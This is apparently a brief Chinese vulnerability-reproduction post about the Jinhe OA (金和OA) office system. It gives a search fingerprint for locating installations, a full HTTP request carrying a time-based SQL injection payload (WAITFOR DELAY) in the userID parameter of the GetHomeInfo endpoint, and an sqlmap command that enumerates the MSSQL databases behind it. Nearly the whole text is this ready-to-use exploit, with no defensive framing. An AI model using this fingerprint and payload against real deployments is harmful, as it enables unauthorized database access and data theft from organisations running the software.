指纹特征
app="金和网络-金和OA"
漏洞复现
GET /c6/jhsoft.mobileapp/AndroidSevices/HomeService.asmx/GetHomeInfo?userID=1'%3b+WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=e4koa3jrqw1ppuejomwsxh1t
Upgrade-Insecure-Requests: 1

python sqlmap.py -u “http://xxx/c6/jhsoft.mobileapp/AndroidSevices/HomeService.asmx/GetHomeInfo?userID=1” -p userID --dbs --batch --dbms mssql --level=3 --random-agent

文章描述了在金和网络-金和OA应用中发现的指纹特征漏洞,涉及通过GET请求进行的SQL注入攻击,使用Python工具SQLMap进行演示。
1001

被折叠的 条评论
为什么被折叠?



